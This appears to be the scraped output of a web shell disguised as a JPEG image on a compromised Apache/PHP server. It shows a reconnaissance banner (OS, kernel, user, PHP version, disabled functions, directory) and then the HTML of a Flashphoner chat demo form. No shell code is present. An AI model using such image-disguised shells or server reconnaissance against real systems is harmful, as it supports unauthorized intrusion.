���� JFIF �� � ( %"1"%)+...383,7(-.-
![]() Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20 System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 User : apache ( 48) PHP Version : 7.4.20 Disable Function : NONE Directory : /usr/local/FlashphonerWebCallServer/client/examples/demo/chat/include/ |
<div class="row" id="showTo"> <div class="col-sm-2"> </div> <div class="col-sm-5 fp-buttonVerticalAlign"> <span class="pull-right" style="margin-right: 0px !important">Chat with</span> </div> <div class="col-sm-5 pull-right"> <input class="form-control" id="to" type="text" value="Bob"/> </div> </div> <div class="row" style="margin-top: 20px"> <div class="col-sm-12"> <div class="form-group"> <div id="chat" style="overflow-y: scroll; height: 100px;" class="text-left form-control"></div> </div> </div> </div> <div class="row"> <div class="col-sm-12"> <div class="form-group"> <textarea id="message" class="form-control" rows="1" style="resize: none;"></textarea> </div> </div> </div> <div class="row"> <div class="col-sm-5 col-sm-offset-7"> <div class="pull-right"> <button id="sendBtn" type="button" class="btn btn-default" onclick="sendMessage(); return false;">Send</button> </div> </div> </div>